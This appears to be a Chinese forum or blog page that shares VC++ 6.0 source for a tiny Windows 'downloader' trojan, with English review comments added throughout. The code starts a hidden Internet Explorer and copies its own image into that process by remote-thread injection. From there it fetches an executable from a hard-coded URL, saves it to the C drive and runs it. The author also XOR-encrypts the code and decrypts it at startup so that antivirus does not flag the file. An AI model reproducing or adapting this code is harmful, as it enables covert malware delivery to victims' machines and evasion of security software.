
📄 无dll插入线程.txt

无dll插入进程,下载者vc源代码

增加代码xor解密功能,以逃过杀毒软件.

生成mini下载者,则需要自己做一个工具了.读懂代码,把相应的部份加密即可.

参考delphi版本的下载者源代码,编出来有16k左右。压缩也有10k多,
于是写了vc的代码。按以下的设置,编译出来2k左右。
还可以再设置一下编译开关,以减小体积。

ps:原代码中有4处没有对反斜杠(\)做转义,以下代码已修正,可编译通过;
编译出来16k,去掉4行注释,编译后3k(编译环境:win2003+vc6.0) 
/* 
"mini_downloader" 
code by kardinal p.s.t 
compile by vc++ 6.0 
can not run under win98; 
*/ 
#include <windows.h> 

#pragma comment(lib,"user32.lib") 
#pragma comment(lib,"kernel32.lib") 

//#pragma comment(linker, "/opt:nowin98") //取消这4行的注释,可编译出2k大的文件 
//#pragma comment(linker, "/merge:.data=.text") 
//#pragma comment(linker, "/merge:.rdata=.text") 
//#pragma comment(linker, "/align:0x200") 
#pragma comment(linker, "/entry:decrpt") 
#pragma comment(linker, "/subsystem:windows") 
#pragma comment(linker, "/base:0x13150000") 

/*
 * Function-pointer slots and process state shared by download(), main() and
 * decrpt() below. They are file-scope so that, after main() copies this whole
 * image into the target process at the same base address, download() running
 * in the target finds them at the same addresses.
 *
 * NOTE(review): as rendered on this page every identifier has been folded to
 * lower case (hinstance, winapi, loadlibrary, ...). Win32 names are
 * case-sensitive, so the listing does not compile as shown; treat it as an
 * analysis artifact of the original VC++ 6.0 source, not as buildable code.
 */
hinstance (winapi *shellrun)(hwnd,lpctstr, lpctstr, lpctstr ,lpctstr , int );// filled in download() from shell32.dll, getprocaddress("shellexecutea") 
dword (winapi *downfile) (lpctstr ,lpctstr, lpctstr ,dword, lpctstr);// filled in download() from urlmon.dll, getprocaddress("urldownloadtofilea") 
handle (winapi *myinject) (handle, lpsecurity_attributes, dword,lpthread_start_routine, lpvoid, dword, lpdword); // filled in main() from kernel32.dll, getprocaddress("createremotethread"); resolving by string keeps the name out of the static import table 
handle processhandle; // target (IE) process, opened in main() with process_all_access 
dword pid; // process id of the "ieframe" window found in main() 
hinstance hshell,hurlmon,hkernel; // module handles returned by the loadlibrary calls above 

/*
 * Payload thread body, executed inside the target process: main() passes the
 * address of this routine to createremotethread after copying the whole image
 * into the target at the same base address, so the address is valid there too.
 *
 * What it does: resolves shellexecutea / urldownloadtofilea by name at run
 * time, downloads the hard-coded URL to c:\ieinst12.exe, launches that file,
 * then calls exitprocess(0) -- which terminates the HOST process (the hidden
 * iexplore.exe started by main()), not merely this thread.
 *
 * NOTE(review): nothing is checked. A failed loadlibrary or getprocaddress
 * leaves a null function pointer that is then called; a failed download still
 * reaches shellexecute on whatever is at the drop path. The fixed URL, the
 * drop path and an exitprocess issued from a browser process are the obvious
 * host-based indicators for detection. Layout of this function's bytes is
 * relied on by decrpt() (it XOR-decodes the region [&download, &decrpt)), so
 * the code is left untouched here.
 */
void download() // thread routine run inside the injected process 
{ 
hshell=loadlibrary("shell32.dll"); 
hurlmon=loadlibrary("urlmon.dll"); 

// Resolved by string at run time, so neither name appears in this image's import table
(farproc&)shellrun=getprocaddress(hshell,"shellexecutea"); 
(farproc&)downfile= getprocaddress(hurlmon,"urldownloadtofilea"); 

// Fetch the payload to a fixed path (reserved dword 0, no status callback), then run it; the trailing 5 is the ShowCmd argument
downfile(null,"http://www.testtest.ac.cn/eeeeeeeeeeeeee ... eeeeen/notepad.exe","c:\\ieinst12.exe",0, null); 
shellrun(0,"open","c:\\ieinst12.exe",null,null,5); 
exitprocess(0); // ends the host (IE) process; the thread does not return 
}; 

/*
 * Injection driver, called from decrpt() after the code region has been
 * decoded (the real entry point is decrpt, see the /entry:decrpt pragma).
 * Steps, numbered as in the original comments:
 *  1. start iexplore.exe hidden, from "<windows drive>program files\internet explorer\";
 *  2. find a window of class "ieframe", resolve its pid and open the process
 *     with process_all_access;
 *  3. read this image's SizeOfImage from its own PE header and reserve that
 *     many bytes in the target AT THE SAME BASE ADDRESS as this image (the
 *     /base:0x13150000 pragma picks a base intended to be free in IE);
 *  4. copy the entire local image into that reservation and start a remote
 *     thread at download()'s address -- identical in both processes because
 *     the base matches, so no relocation and no DLL on disk are needed (this
 *     is the "no-DLL injection" the page title refers to);
 *  5. close the process handle.
 *
 * NOTE(review), caveats visible in the code (deliberately not fixed -- the
 * bytes of this function are part of the region decrpt() XOR-decodes):
 *  - no return value is checked: a null window handle, a failed openprocess
 *    or a failed virtualallocex propagate silently into the later calls;
 *  - findwindow returns ANY "ieframe" window, not necessarily the instance
 *    just launched; the 500 ms sleep is the only synchronisation;
 *  - the IE path is hard-coded (English "program files", same drive as the
 *    Windows directory); strncpy copies just the 3-byte drive prefix;
 *  - download() in the target reaches loadlibrary/getprocaddress/exitprocess
 *    through the COPIED import table, which presumably only resolves when
 *    kernel32 is mapped at the same address in both processes (the pre-ASLR
 *    systems this targets; the header says it will not run on Win98).
 */
void main() // injection driver 
{ 
//1. build the IE path from the Windows drive and start IE hidden 
char iename[max_path],iepath[max_path]; 
zeromemory(iename,sizeof(iename)); 
zeromemory(iepath,sizeof(iepath)); 

getwindowsdirectory(iepath,max_path); 
strncpy(iename,iepath,3); // drive letter, colon and backslash only; iename was zeroed so it stays terminated 
strcat(iename,"program files\\internet explorer\\iexplore.exe"); 
winexec(iename,sw_hide); 
sleep(500); // sole wait for IE to create its window; nothing verifies it did 

//2. locate an IE window and open its process 
hwnd htemp; 
htemp=findwindow("ieframe",null); 
getwindowthreadprocessid(htemp,&pid); 
processhandle=openprocess(process_all_access, false, pid); 

//3. reserve memory in the target 
hmodule module; 
lpvoid newmodule; 
dword size; 
lpdword lpimagesize; // receives a dword VALUE (SizeOfImage) despite the pointer type 

module = getmodulehandle(null);// base address of this process's own image 
// Read IMAGE_OPTIONAL_HEADER.SizeOfImage: [base+0x3c] is e_lfanew, and the
// field lies at NT-headers + 0x50 (4 signature + 20 file header + 0x38).
_asm 
{ 
push eax; 
push ebx; 
mov ebx,module; 
mov eax,[ebx+0x3c]; 
lea eax,[ebx+eax+0x50]; 
mov eax,[eax] 
mov lpimagesize,eax; 
pop ebx; 
pop eax; 
}; 
size=(dword)lpimagesize; 
newmodule = virtualallocex(processhandle, module, size, mem_commit | mem_reserve, page_execute_readwrite); // ask for the SAME base as the local image so copied pointers and globals stay valid; null if that range is taken 

//4. copy the image and start the remote thread 

writeprocessmemory(processhandle, newmodule, module, size, null);// whole image, headers and import table included 
lpthread_start_routine entrypoint; 
// Equivalent to entrypoint = (lpthread_start_routine)download; the address is
// the same in the target because the image was placed at the same base.
__asm 
{ 
push eax; 
lea eax,download; 
mov entrypoint,eax; 
pop eax 
} 
hkernel=loadlibrary("kernel32.dll"); 
(farproc&)myinject= getprocaddress(hkernel,"createremotethread"); // resolved by string at run time 
myinject(processhandle, null, 0, entrypoint, module, 0, null); // run download() in the target; the module argument is not read by it 

//5. release the process handle 
closehandle(processhandle); 

return; 
} ; 

//解密函数 
/*
 * Real program entry point (see the "/entry:decrpt" linker pragma).
 *
 * Intended operation: the bytes of download() and main() are stored in the
 * binary XOR-ed with a single-byte key that is NOT stored anywhere; this
 * routine brute-forces the key in place (1..0xff) and runs main() once a key
 * works. The code as listed is not yet encrypted -- the page text says the
 * reader is expected to encrypt that region with a separate tool.
 *
 * Layout assumptions the routine depends on (and the reason this block gets
 * comments only): download, main and decrpt must be laid out contiguously in
 * source order, because the region saved, rewritten and decoded is exactly
 * [&download, &decrpt). Any edit to those two functions changes the bytes and
 * therefore the ciphertext the tool would have to produce.
 *
 * NOTE(review), defects visible in the code:
 *  - `shellcode` is a fixed 500-byte stack buffer but the copy length is
 *    &decrpt - &download with no bound check; if the two functions are more
 *    than 500 bytes apart the decoder overflows its own stack frame;
 *  - a wrong key leaves garbage in the code region; the __try/__except only
 *    covers faults raised while main() runs, and `return` right after main()
 *    means nothing verifies that the decoded bytes were the real plaintext.
 */
void decrpt() 
{ 

handle myps; 
dword oldattr; 
byte shellcode[500]; // scratch copy of the encoded region; its size is never compared with the copy length 
zeromemory(shellcode,sizeof(shellcode)); 
myps=getcurrentprocess(); 
::virtualprotectex(myps,&download,0x1000,page_execute_readwrite,&oldattr); // make the code pages writable so they can be rewritten in place 
// Save the original bytes of [&download, &decrpt) into shellcode (ecx = length)
_asm 
{ 
pushad; 
lea esi,download 
lea edi,shellcode; 
lea ecx,decrpt; 
sub ecx,esi; 
en1: 
lodsb; 
stosb; 
dec ecx; 
jne en1; 
popad; 

}; 

// Try each single-byte key: rewrite the region as saved_bytes XOR i, then run main()
int i; 
for (i=1;i<=0xff;i++) 
{ 
_asm 
{ 
pushad; 
lea esi,shellcode; 
lea edi,download; 
lea ecx,decrpt; 
sub ecx,edi; 
en2: 
lodsb; 
mov ebx,i; 
xor al,bl; 
stosb; 
dec ecx; 
jne en2; 
popad; 

}; 

// Author's note (translated): this construct is what keeps ordinary antivirus
// engines from flagging the file. Mechanically it swallows the fault a wrong
// key causes when main() executes, so the loop can move on to the next key.
__try 
{ 
main(); 
return; 
} 
__except(exception_execute_handler) 

{ 

}; 


} 
return; 
};
